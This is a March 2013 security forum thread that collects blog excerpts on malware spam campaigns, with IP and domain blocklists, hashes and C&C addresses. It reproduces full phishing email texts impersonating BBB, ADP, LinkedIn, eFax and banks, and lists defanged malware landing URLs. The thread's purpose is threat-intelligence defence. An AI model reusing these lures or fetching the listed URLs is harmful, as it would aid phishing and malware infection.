> https://lh3.ggpht.com/-9r2z1zqGRKg/UToRQZlYDAI/AAAAAAAABAY/V8WMW3duxJc/s1600/att-bill-2.png
In this case the link goes to a redirector page at [donotclick]vtcrm.update .se/eben/index.html hosted 62.109.34.50 in Sweden. It looks like someone has speedily removed the redirector page so I can't tell you much about the malicious landing page. Kudos to Ilait AB or whoever fixed the problem!"
___
RU:8080 and Amerika SPAM runs
- http://blog.dynamoo.com/2013/03/ru8080-and-amerika-spam-runs.html
8 March 2013 - "For about the past year I have seen two very persistent spam runs leading to malware, typically themed along the lines of fake emails from the BBB, LinkedIn, NACHA, USPS and ADP. The most obvious characteristic of one of the spam runs in the use of a malware landing page containing .ru:8080, registered through NAUNET to the infamous "private person". In order to aid researchers, I have labelled this series as RU:8080*. You can see some current nastiness in action at Malware Must Die**. But there's a second spam run as well, which appears to be similarly themed but using different servers. In this case, the domains registered are typically .net, .org and .com emails (with .pro and .biz used from time-to-time). These domains are registered with fake names and addresses purporting to be in the US, but indicators show that this spam may well originate from within Russia. I've labelled this series as Amerika***... The Amerika spam run is a little harder to identify, so there may be some errors in it. I don't have any deep insight into either spam run or the payloads they deliver, but if you are interested in looking more deeply at the patterns then hopefully this will be of some use!"
* http://blog.dynamoo.com/search/label/RU%3A8080
** http://malwaremustdie.blogspot.co.uk/2013/03/ru8080columnphp-hey-stealer-what-do-you.html
March 5, 2013
*** http://blog.dynamoo.com/search/label/Amerika
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Electronic Payment Cancellation E-mail Messages - 2013 Mar 08
Fake Business Complaint E-mail Messages - 2013 Mar 08
Fake Italian Online Dating Request E-mail Messages - 2013 Mar 08
Fake Portuguese Payment Invoice E-mail Messages - 2013 Mar 08
Fake Portuguese Banking Service Notification E-mail Messages - 2013 Mar 08
(Links and more detail at the cisco URL above.)
:mad:
AplusWebMaster
2013-03-11, 19:41
FYI...
Something evil on 37.59.214.0/28
- http://blog.dynamoo.com/2013/03/something-evil-on-3759214028.html
11 March 2013 - "37.59.214.0/28 is an OVH IP range* suballocated to a person called Sidharth Shah in Maryland (more of whom later). At the moment it is hosting a number of malware sites with a hard-to-determine payload such as [donotclick]55voolith .info:89/forum/had.php which is evading automated analysis**. The owner of this block is as follows:
organisation: ORG-SS252-RIPE
org-name: Shah Sidharth
org-type: OTHER
address: 12218 Skylark Rd
address: 20871 Clarksburg
address: US
abuse-mailbox: ovhresell @gmail .com
phone: +1.5407378283
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
source: RIPE # Filtered
Malware is hosted on 37.59.214.0, 37.59.214.1 and 37.59.214.0. There do not appears to be any legitimate sites in this range. Google has already flagged some of these as malicious (marked in red), so you can safely assume that they are all malicious..."
(List at the dynamoo URL above.)
** http://urlquery.net/report.php?id=1368280
AS16276 (OVH)
* https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 6134 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-03-11, and the last time suspicious content was found was on 2013-03-11... Over the past 90 days, we found 911 site(s) on this network... that appeared to function as intermediaries for the infection of 2222 other site(s)... We found 1665 site(s)... that infected 8762 other site(s)..."
___
Something evil on 176.31.140.64/28
- http://blog.dynamoo.com/2013/03/something-evil-on-176311406428.html
11 March 2013 - "176.31.140.64/28 is an OVH block suballocated to Sidharth Shah (mentioned in this earlier post)*. It contains a a small number of malicious domains flagged by Google (in red), most of the rest of the sites have a very poor WOT rating (in yellow). I'll post more details later. You can safely assume that everything in this block is malicious, and I note that some of the domains are refugees from this malware site.
Malware is hosted on 176.31.140.64, 176.31.140.65, 176.31.140.66 and 176.31.140.67. There appear to be no legitimate sites in this block..."
(List at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/03/something-evil-on-3759214028.html
___
Sidharth Shah / OVH / itechline .com
- http://blog.dynamoo.com/2013/03/sidharth-shah-ovh-itechlinecom.html
11 March 2013 - "I have now come across several incidents of malware hosted in an OVH IP address range suballocated to Sidharth Shah. The blocks that I can identify so far are:
5.135.20.0/27
5.135.27.128/27
5.135.204.0/27
5.135.218.32/27
5.135.223.96/27
37.59.93.128/27
37.59.214.0/28
46.105.183.48/28
91.121.228.176/28
94.23.106.224/28
176.31.106.96/27
176.31.140.64/28
178.32.186.0/27
178.32.199.24/29
188.165.180.224/27
These IPs are mostly malware or fake goods. Legitimate sites seem to be nonexistant, although these IP ranges have hosted legitimate sites in the past. I would personally recommend blocking them all, but if you want to see a fuller analysis of WOT ratings and Google Safe Browsing diagnostics see here*...
The email address sidharth134 @gmail .com is also associated with itechline .com which is a company with an unenviable F rating from the BBB, who list the principal as being Sidharth Shah. BBB rating is based on 16 factors.
Factors that lowered the rating for ITechline.com include:
Length of time business has been operating
8 complaints filed against business
Failure to respond to 7 complaints filed against business
> https://lh3.ggpht.com/-D1aA_fdVk64/UT3z3gGLveI/AAAAAAAABAo/ouAPVZ07ays/s1600/itechline.png
... ITechline.com has garnered some very negative consumer reviews..."
* http://www.dynamoo.com/files/sidharth-shah.csv
___
Fake Wire Transfer SPAM / gimikalno .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-gimikalnoru.html
11 Mar 2013 - "This fake wire transfer spam leads to malware on gimikalno .ru:
Date: Mon, 11 Mar 2013 04:00:22 +0000 [00:00:22 EDT]
From: Xanga [noreply@xanga .com]
Subject: Re: Fwd: Wire Transfer Confirmation (FED REFERENCE 16442CU385)
Dear Bank Account Operator,
WIRE TRANSFER: FED62403611378975648
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]gimikalno .ru:8080/forum/links/column.php (report here*) hosted on:
5.9.40.136 (Hetzner, Germany)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
Blocklist:
5.9.40.136
66.249.23.64
94.102.14.239
212.180.176.4
117.104.150.170
41.72.150.100 ..."
* http://urlquery.net/report.php?id=1371618
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.102.14.239
:fear::mad:
AplusWebMaster
2013-03-12, 15:32
FYI...
Fake BofA emails lead to malware
- http://blog.webroot.com/2013/03/12/fake-bofa-cashpro-online-digital-certificate-themed-emails-lead-to-malware/
March 12, 2013 - "Over the past 24 hours, we intercepted tens of thousands of malicious emails attempting to socially engineering BofA’s CashPro users into downloading and executing a -bogus- online digital certificate attached to the fake emails...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_malware_cashpro_social_engineering.png
Detection rate for the malicious executable: MD5: bfe7c4846823174cbcbb10de9daf426b * ... Password-Stealer.
The attachement uses the following naming convention:
cashpro_cert_7585cc6726.zip
cashpro_cert_cc1d4a119071.zip...
It then attempts to connect to 74.207.227.67; 17.optimaxmagnetics .us, and successfully establishes a connection with the C&C server at 50.28.90.36 :8080/forum/viewtopic.php...
More MD5s are known to have phoned back to the same IP..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/4a6ab406f82e620a24e25d717ba04657d9b2ef254d7d852323ba2d077c0bcdf3/analysis/
File name: Ywiti
Detection ratio: 36/45
Analysis date: 2013-03-11
___
Fake "End of Aug. Stat. Required" SPAM / giminkfjol .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-stat-required-spam.html
12 March 2013 - "This spam leads to malware on giminkfjol .ru:
From: user @victimdomain .com
Sent: 12 March 2013 04:19
Subject: Re: End of Aug. Stat. Required
Good morning,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
The attachment Invoices-ATX993823.htm attempts to redirect the victim to [donotclick]giminkfjol .ru:8080/forum/links/column.php (report here*) hosted on:
5.9.40.136 (Hetzner, Germany)
94.102.14.239 (Netinternet, Turkey)
213.215.240.24 (COLT, Italy)
Blocklist:
5.9.40.136
94.102.14.239
213.215.240.24
giminkfjol .ru ..."
* http://urlquery.net/report.php?id=1389261
... Detected suspicious URL pattern... Blackhole 2 Landing Page 213.215.240.24
___
HP LaserJet printer backdoor
- http://h-online.com/-1821334
12 March 2013 - "A number of HP LaserJet printers can be accessed through the network and unencrypted data can be read from them without authentication. The US-CERT has issued an advisory* that warns users of these printers and is calling on them to update the printer's firmware with a fixed version... HP's own advisory** identifies HP LaserJet Pro P1102w, P1606dn, M1212nf MFP (Multi Function Printer), M1213nf MFP, M1214nfh MFP, M1216nfh MFP, M1217nfw MFP, M1219nf MFP and CP1025nw printers as affected by the problem and has issued firmware and installation instructions for that firmware to close the vulnerability."
* http://www.kb.cert.org/vuls/id/782451
Last revised: 11 Mar 2013
** https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03684249
Last Updated: 2013-03-06
References: CVE-2012-5215
___
Fake News Diet Supplement Site
- http://www.gfi.com/blog/thinspo-tumblr-page-leads-to-fake-news-diet-supplement-site/
March 12, 2013 - "... something called “Thinspo” – it’s a shortened term for “Thinspiration”, usually a tag on social media sites... an attempt at directing such individuals to fake news websites touting “green coffee” weight loss offers. Here’s the Tumblr in question, which contains numerous “Thinspo” pictures...
> http://www.gfi.com/blog/wp-content/uploads/2013/03/thinspo1.jpg
Sending kids and teens with potentially serious body image hang-ups to -fake- news report sites such as this which practically beg them to sign up and lose weight is incredibly creepy... It’s entirely possible there’s more of them lurking on various social networks though, so please be aware that no matter how controversial the subject, someone is always going to want to take advantage of it for their own benefit."
___
Fake ACH Batch Download Notification
- http://security.intuit.com/alert.php?a=77
11 Mar 2013 - "People are receiving fake emails with the title 'ACH Batch Download Notification'. Below is a copy of the email people are receiving, including the mistakes shown.
Refund check in the amount of $4,370.00 for
The following ACH batch has been submitted for processing.
Initiated By: colleen
Initiated Date & Time: Mon, 11 Mar 2013 19:59:38 +0500 Batch ID: 8242710 Batch Template Name: PAYROLL
Please view the attached file to review the transaction details.
This is the end of the fake email.
Steps to Take Now
- Do -not- click on the link in the email or open the attached file...
- Delete the email."
___
Fake Wire Transfer SPAM / giminanvok .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-giminanvokru.html
11 Mar 2013 - "Another wire transfer spam, this time leading to malware on giminanvok .ru:
Date: Mon, 11 Mar 2013 02:46:19 -0300 [01:46:19 EDT]
From: LinkedIn Connections [connections@linkedin.com]
Subject: Fwd: Wire Transfer (5600LJ65)
Dear Bank Account Operator,
WIRE TRANSFER: FED694760330367340
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]giminanvok .ru:8080/forum/links/column.php (report pending*) hosted on the same IPs used earlier today:
5.9.40.136 (Hetzner, Germany)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
I strongly recommend that you block access to these IPs if you can."
:mad:
AplusWebMaster
2013-03-13, 14:42
FYI...
Fake BBB emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2013/03/13/spamvertised-bbb-your-accreditation-terminated-themed-emails-lead-to-black-hole-exploit-kit/
March 13, 2013 - "Over the past week, a cybercriminal/gang of cybercriminals whose activities we’ve been actively profiling over a significant period of time, launched two separate massive spam campaigns, this time impersonating the Better Business Bureau (BBB), in an attempt to trick users into thinking that their BBB accreditation has been terminated. Once users click on any of the links found in the malicious emails, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the first BBB themed spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/03/bbb_better_business_bureau_email_spam_exploits_malware_black_hole_exploit_kit.png
Sample screenshot of the second BBB themed spamvertised campaign:
> https://webrootblog.files.wordpress.com/2013/03/bbb_better_business_bureau_email_spam_exploits_malware_black_hole_exploit_kit_01.png
... Malicious domain names reconnaissance:
bbb-complaint .org – 63.141.224.171; 149.154.68.214; 155.239.247.247 – Email: gonumina1 @dbzmail .com
Name Server: NS1.STREETCRY .NET – 93.186.171.133 – Email: webclipradio @aol .com
Name Server: NS2.STREETCRY .NET – 15.214.13.118 – Email: webclipradio@aol .com
bbb-accredited .net – not responding
Responding to 149.154.68.214 are also the following malicious domains:
fab73 .ru, misharauto .ru
secureaction120 .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: markovochn @yandex .ru
secureaction150 .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: markovochn @yandex .ru
iberiti .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: biedermann @iberiti .com
notsk .com – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: jenifer@notsk .com
metalcrew .net – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: heffner@metalcrew .net
roadix .net – 149.154.68.214; 155.239.247.247; 141.0.176.234 – Email: marunga@roadix .net
gatovskiedelishki.ru – 149.154.68.214; 155.239.247.247; 141.0.176.234 conbicormiks .ru
Name servers used in the campaign:
Name Server: NS1.STREETCRY .NET – 93.186.171.133 – Email: webclipradio @aol .com
Name Server: NS2.STREETCRY .NET – 15.214.13.118 – Email: webclipradio @aol .com
Name Server: NS1.E-ELEVES .NET – 173.208.88.196
Name Server: NS1.E-ELEVES .NET – 43.109.79.23
Name Server: NS1.LETSGOFIT .NET – 173.208.88.196 – Email: weryrebel @live.com
Name Server: NS1.LETSGOFIT .NET – 11.3.51.158 – Email: weryrebel @live .com
Name Server: NS1.BLACKRAGNAROK .NET – 209.140.18.37 – Email: onetoo @gmx .com
Name Server: NS2.BLACKRAGNAROK .NET – 6.20.13.25 – Email: onetoo @gmx .com
Name Server: NS1.OUTBOUNDUK .NET
Name Server: NS2.OUTBOUNDUK .NET
Not surprisingly, we’ve already seen the onetoo @gmx .com email in the following previously profiled malicious campaign – “Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side exploits and malware“.
Upon successful client-side exploitation, a sampled campaign drops: MD5: 126a104f260cb0059b901c6a23767d76 * ... Worm:Win32/Cridex.E ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/18bb7b1bd5a9f9433649fc4b737eda32e32538a2d40e49afc786ca94993b3f77/analysis/
File name: cf2d476e6b1a8eae707ffae520c4d019c7226948
Detection ratio: 28/45
Analysis date: 2013-03-10
___
- http://gfisoftware.tumblr.com/post/44796405851/your-better-business-bureau-accreditation-has-been
5 days ago - "... Subjects seen:
BBB Accreditation Terminated
Typical e-mail details:
Valued Owner:
Your accreditation with Better Business Beaureau was Discontinued
A number of latest claims on you / your company motivated us to provisional Suspend your accreditation with Better Business Beaureau. The information about the our decision are available for review at a link below. Please give attention to this issue and inform us about your sight as soon as possible.
We amiably ask you to click and review the SUSPENSION REPORT to meet on this grievance.
If you think you got this email by mistake - please forward this message to your principal or accountant
We awaits to your prompt rebound ..."
___
Zbot sites to block 13/3/13
- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
13 Mar 2013 - "These domains and IPs seem to be active as Zbot C&C servers. The obsolete .su (Soviet Union) domain is usually a tell-tale sign of.. something*.
76.185.101.239
77.74.197.190
89.202.183.27
89.253.234.247
201.236.78.182
218.249.154.140
aesssbacktrack .pl
beveragerefine .su
dinitrolkalor .com
dugsextremesda .su
establishingwi .su
eurasianpolicy .net
euroscientists .at
ewebbcst .info
fireinthesgae .pl
girdiocolocai .com
machinelikeleb .su
mixedstorybase .su
satisfactorily .su
smurfberrieswd .su
sputtersmorele .pl
suggestedlean .com
trashinesscro .com
upkeepfilesyst .su
URLs seen:
[donotclick]beveragerefine .su/hjz/file.php
[donotclick]euroscientists .at/hjz/file.php
[donotclick]machinelikeleb .su/fiv/gfhk.php
[donotclick]mixedstorybase .su/hjz/file.php
[donotclick]satisfactorily .su/hjz/file.php
[donotclick]smurfberrieswd .su/hjz/file.php
And for the record, those IPs belong to:
76.185.101.239 (Road Runner, US)
77.74.197.190 (UK Dedicated Servers, UK)
89.202.183.27 (Interoute / PSI, UK)
89.253.234.247 (Rusonyx, Russia)
201.236.78.182 (Municipalidad De Quillota, Chile)
218.249.154.140 (Beijing Zhongbangyatong Telecom, China)..."
* https://www.abuse.ch/?p=3581
___
Fake "Wapiti Lease Corp" SPAM / giminaaaao .ru
- http://blog.dynamoo.com/2013/03/wapiti-lease-corporation-spam.html
13 March 2013 - "A fairly bizarre spam leading to malware on giminaaaao .ru:
From: IESHA WILLEY [mailto:AtticusRambo @tui-infotec .com]
Sent: 13 March 2013 11:22
To: Sara Smith
Subject: Fwd: Wapiti Land Corporation Guiding Principles attached
Hello,
Attached is a draft of the Guiding Principles that the Wapiti Lease Corporation (“W.L.C”) would like to publish. Prior to doing that, WLC would like you to have an opportunity for a preview and to provide any
comments that you would like to make. Please let me know that you have reviewed it and what comments you might have.
Thank you,
IESHA WILLEY
WLC
This comes with an attachment called WLC-A0064.htm although I have another sample "from" a DEANNE AMOS with an attachment of WLC-A5779.htm. In any case, the attachment tries to direct the victim to a malware landing page at [donotclick]giminaaaao .ru:8080/forum/links/column.php (report here*) hosted on:
93.174.138.48 (Cloud Next / Node4, UK)
94.102.14.239 (Netinternet , Turkey)
213.215.240.24 (COLT, Italy)
Blocklist:
93.174.138.48
94.102.14.239
213.215.240.24
giminaaaao .ru
giminkfjol .ru
giminanvok .ru "
* http://urlquery.net/report.php?id=1406092
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.102.14.239
___
Fake "Copies of policies" SPAM / giimiiifo .ru
- http://blog.dynamoo.com/2013/03/copies-of-policies-spam-giimiiiforu.html
13 Mar 2013 - "This spam leads to malware on giimiiifo .ru:
Date: Wed, 13 Mar 2013 06:49:25 +0100
From: LinkedIn Email Confirmation [emailconfirm @linkedin .com]
Subject: RE: Alonso - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Alonso SAMS,
The malicious payload is at [donotclick]giimiiifo .ru:8080/forum/links/column.php hosted on two IPs we saw earlier:
94.102.14.239 (Netinternet , Turkey)
213.215.240.24 (COLT, Italy)"
:mad:
AplusWebMaster
2013-03-14, 20:49
FYI...
Fake Efax SPAM / gimiinfinfal .ru
- http://blog.dynamoo.com/2013/03/efax-corporate-spam-gimiinfinfalru.html
14 Mar 2013 - "This eFax-themed spam leads to malware on gimiinfinfal .ru:
Date: Thu, 14 Mar 2013 07:39:23 +0300
From: SarahPoncio @mail .com
Subject: Efax Corporate
Attachments: Efax_Corporate.htm
Fax Message [Caller-ID: 449555234]
You have received a 44 pages fax at Thu, 14 Mar 2013 07:39:23 +0300, (751)-674-3105.
* The reference number for this fax is [eFAX-263482326].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
There's an attachment called Efax_Corporate.htm which leads to malware on [donotclick]gimiinfinfal .ru:8080/forum/links/column.php (report here) hosted on:
94.102.14.239 (Netinternet, Turkey)
50.116.23.204 (Linode, US)
213.215.240.24 (COLT, Italy)
Blocklist:
50.116.23.204
94.102.14.239
213.215.240.24
giimiiifo .ru
___
Fake LinkedIn SPAM / teenlocal .net
- http://blog.dynamoo.com/2013/03/linkedin-spam-teenlocalnet.html
14 March 2013 - "This fake LinkedIn spam leads to malware on teenlocal .net:
From: messages-noreply@bounce .linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 14 March 2013 16:32
Subject: Frank and Len have endorsed you!
Congratulations! Your connections Frank Garcia and Len Rosenthal have endorsed you for the following skills and expertise:
Program Management
Strategic Planning
Continue
You are receiving Endorsements emails. Unsubscribe.
This email was intended for Paul Stevens (Chief Financial Officer, Vice President and General Manager, Aerospace/Defense, Pacific Consolidated Industries). Learn why we included this. 2013, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]teenlocal.net/kill/force-vision.php (report here) hosted on:
24.111.157.113 (Midcontinent Media, US)
58.26.233.175 (Telekom Malaysia, Malaysia)
155.239.247.247 (Centurion Telkom, South Africa)
Blocklist:
24.111.157.113
58.26.233.175
155.239.247.247 ..."
(More detail at the dynamoo URL above.)
:fear::mad:
AplusWebMaster
2013-03-15, 15:36
FYI...
Fake Wire Transfer emails serve client-side exploits and malware
- http://blog.webroot.com/2013/03/15/cybercriminals-resume-spamvertising-re-fwd-wire-transfer-themed-emails-serve-client-side-exploits-and-malware/
March 15, 2013 - "Over the last couple of days, a cybercricriminal/gang of cybercriminals that we’ve been extensively profiling, resumed spamvertising tens of thousands of emails, in an attempt to trick users that they have a pending wire transfer. Once users click on any of the links found in the malicious emails, they’re exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_exploits_malware_black_hole_exploit_kit_wire_transfer.png
... Sample client-side exploits serving URL: hxxp://gimikalno .ru:8080/forum/links/column.php
Sample malicious payload dropping URL: hxxp://gimikalno .ru:8080/forum/links/column.php?hf=2w:1l:1l:2v:1f&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&s=1k&td=r&xj=f
Upon successful client-side exploitation, the campaign drops MD5: 93a104caf7b01de69614498de5cf870a * ... Trojan.FakeMS
... phones back to:
149.156.96.9 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
72.251.206.90 /J9/vp//EGa+AAAAAA/2MB9vCAAAA/
202.29.5.195 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
213.214.74.5 /AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen 213.214.74.5 in... previously profiled campaigns
Malicious domain name reconnaissance:
gimikalno .ru – 66.249.23.64; 94.102.14.239; 5.9.40.136
Name Servers: ns1.gimikalno .ru 41.168.5.140
Name Servers: ns2.gimikalno .ru 110.164.58.250 (nangrong.ac.th)
Name Servers: ns3.gimikalno .ru 210.71.250.131 (tecom.com.tw)
Name Servers: ns4.gimikalno .ru 194.249.217.8 (gimnazija-tolmin1.si)
Name Servers: ns5.gimikalno .ru 72.251.206.90 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/b87c1be1dd90d9ae8e7b04c87a6ab0a2b706ded02e2f4c3db45db1bed9d46642/analysis/
File name: docprop.dll
Detection ratio: 26/45
Analysis date: 2013-03-13
___
Malware sites to block 15/3/13
- http://blog.dynamoo.com/2013/03/malware-sites-to-block-15313.html
15 March 2013 - "These seem to be the currently active IPs and domains being used by the RU:8080 gang. Of these the domain gilaogbaos .ru seems to be very active this morning. Block 'em if you can:
5.9.40.136
41.72.150.100
50.116.23.204
66.249.23.64
94.102.14.239
212.180.176.4
213.215.240.24...
For the record, these are the registrars either hosting the domains or offering support services. It is possible that some have been taken down already.
5.9.40.136 (Hetzner, Germany)
41.72.150.100 (Hetzner, South Africa)
50.116.23.204 (Linode, US)
66.249.23.64 (Endurance International Group, US)
94.102.14.239 (Netinternet, Turkey)
212.180.176.4 (Supermedia, Poland)
213.215.240.24 (COLT, Italy) ..."
(More listed at the dynamoo URL above.)
___
Fake ADP SPAM / picturesofdeath .net
- http://blog.dynamoo.com/2013/03/adp-package-delivery-confirmation-spam.html
15 March 2013 - "This fake ADP spam leads to malware on... picturesofdeath .net:
From: ADP Chesapeake Package Delivery Confirmation [mailto:do_not_reply @adp .com]
Sent: 15 March 2013 14:45
Subject: =?iso-8859-1?Q?ADP Chesapeake - Package Delivery Notification
Importance: High
This message is to notify you that your package has been processed and is on schedule for delivery from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Tusesday, 5:00pm
Tracking Number (if one is available for this package): 1Z023R643116536498
Details: Click here to overview and/or modify order
We will notify you via email if the status of your delivery changes.
Access these and other valuable tools at support.ADP.com:
o Payroll and Tax Calculators
o Order Payroll Supplies, Blank Checks, and more
o Submit requests online such as SUI Rate Changes, Schedule Changes, and more
o Download Product Documentation, Manuals, and Forms
o Download Software Patches and Updates
o Access Knowledge Solutions / Frequently Asked Questions
o Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP.com ...
The malicious payload is at [donotclick]picturesofdeath.net/kill/long_fills.php (report here*) hosted on:
24.111.157.113 (Midcontinent Media, US)
155.239.247.247 (Centurion Telkom, South Africa)..."
(More URLs listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1446662
... Detected live BlackHole v2.0 exploit kit 24.111.157.113
- http://blog.webroot.com/2013/03/18/adp-package-delivery-notification-themed-emails-lead-to-black-hole-exploit-kit/
March 18, 2013 - "A currently ongoing malicious email campaign is impersonating ADP in an attempt to trick its customers into thinking that they’ve received a ‘Package Delivery Notification.’ In reality though, once a user clicks on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the Black Hole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/adp_package_delivery_notification_email_spam_exploits_malware_black_hole_exploit_kit.png
... responded to 24.111.157.113; 58.26.233.175; 155.239.247.247... 58.26.233.175; 155.239.247.247... 77.241.198.65; 80.241.211.26; 83.255.90.5; 103.14.8.20; 190.30.219.85... phones back to 212.68.63.82..."
(More detail at the webroot URL above.)
___
BoA SPAM - on short list of Scammers’ Spam Lures
- http://www.hotforsecurity.com/blog/bank-of-america-on-short-list-of-scammers-spam-lures-5668.html
March 15, 2013 - "... crooks unleashed a series of aggressive spam campaigns that include the Bank of America in the title as bait. In the context of a security breach, the name of the bank was used to catch customers’ attention, infect them with malware, have them type in sensitive data or entice them into sending money in advance for a service they will never receive. “Online Banking Passcode Modified” invites people to click a link to reset their online banking passcode. The same template and con is entirely recycled from a similar attack in November 2012. This new spamvertised malware campaign attempts to get Bank of America customers to -click a link- to a webpage associated with the Redkit Exploit Kit – a crimeware tool that exploits vulnerabilities in browsers and plugins to silently infect victims’ PCs.
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Online-Banking-Passcode-Modified.png
"Bank of America Corporate Office Headquarters” and the very recent “Payment Notification from Bank of America” spam campaigns are examples of a complicated Nigerian-like scam informing customers that their funds will be transferred to the United States Treasury Account...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Bank-of-America-Corporate-Office-Headquarters.png
"Bank of America Alert: Suspicious Activities on your Account!” and “Bank of America Alert: Sign-in to Online Banking Locked” lure customers to a phishing page...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Bank-of-America-Alert-Suspicious-Activities-on-your-Account.png
"Reminder: Bank of America Customer Survey” is another active scam ...
> http://www.hotforsecurity.com/wp-content/uploads/2013/03/Reminder-Bank-of-America-Customer-Survey.png
Bank of America has been recycled in spammed scams since 2006 and used multiple times a year, for more or less the same results: steal card and identity information, infect people with malware, and unwarily recruit them into money-muling operations..."
:mad:
AplusWebMaster
2013-03-18, 22:01
FYI...
Fake LinkedIn SPAM / applockrapidfire .biz
- http://blog.dynamoo.com/2013/03/linkedin-spam-applockrapidfirebiz.html
18 March 2013 - "This fake LinkedIn spam leads to malware on applockrapidfire .biz:
From: David O'Connor - LinkedIn [mailto:kissp @gartenplandesign .de]
Sent: 18 March 2013 15:34
Subject: Join my network on LinkedIn
Importance: High
LinkedIn
REMINDERS
Invitation reminders:
From David O\'Connor (animator at ea)
PENDING MESSAGES
There are a total of 9 messages awaiting your response. Go to InBox now.
This message was sent to username @domain .com. Don't want to receive email notifications? Login to your LinkedIn account to Unsubscribe.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. c 2013, LinkedIn Corporation.
The link in the message goes through a legitimate hacked site to a malware landing page on [donotclick]applockrapidfire .biz/closest/209tuj2dsljdglsgjwrigslgkjskga.php (report here*) hosted on 78.46.222.237 (Hetzner, Germany). applockrapidfire .biz was registered just today to a presumably fake address...
URLquery detects traffic to these additional IPs that you might want to block too:
50.22.196.70 (Softlayer / Maxmind LLC, US)
66.85.130.234 (Secured Servers LLC / Phoenix NAP, US)
194.165.17.3 (ADM Service Ltd, Monaco)
The nameservers are NS1.QUANTUMISPS .COM (5.9.212.43: Hetzner, Germany) and NS2.QUANTUMISPS .COM (66.85.131.123: Secured Servers LLC / Phoenix NAP, US). quantumisps .com was registered to an anonymous person on 2013-03-15...
Recommended blocklist:
5.9.212.43
50.22.196.70
66.85.130.234
66.85.131.123
78.46.222.237
194.165.17.3
quantumisps .com
applockrapidfire .biz"
* http://urlquery.net/report.php?id=1500577
... Detected live BlackHole v2.0 exploit kit
___
Fake DHL emails contain malware
- http://nakedsecurity.sophos.com/2013/03/18/express-shipment-notification-emails-malware/
March 18, 2013 - "... Online criminals have spammed out a large number of messages, claiming to come from DHL Express International, that are designed to install malware onto the computers of unsuspecting PC users. Here is what a typical example of an email spammed out in the attack looks like:
> https://sophosnews.files.wordpress.com/2013/03/dhl.jpg?w=640
Attached to the emails is a ZIP file, containing malware. The filename of the ZIP file can vary, but takes the form "DHL reportXXXXXX.zip" (where the 'X's are a random code)... Troj/BredoZp-S* ..."
* http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~BredoZp-S.aspx
:mad:
AplusWebMaster
2013-03-19, 16:52
FYI...
Fake "Statement Reqiured" SPAM / hiskintako .ru
- http://blog.dynamoo.com/2013/03/end-of-aug-statement-reqiured-spam.html
19 Mar 2013 - "This -spam- leads to malware on hiskintako .ru:
Date: Tue, 19 Mar 2013 08:04:18 +0300
From: "package update Ups" [upsdelivercompanyb @ups .com]
Subject: Re: FW: End of Aug. Statement Reqiured
Attachments: Invoices-CAS9927.htm
Hi,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
-----------------------
Date: Tue, 19 Mar 2013 02:18:06 +0600
From: MyUps [ups-delivery-services @ups .com]
Subject: Re: FW: End of Aug. Stat. Required
Hi,
as reqeusted I give you inovices issued to you per dec. 2012 ( Internet Explorer file)
Regards
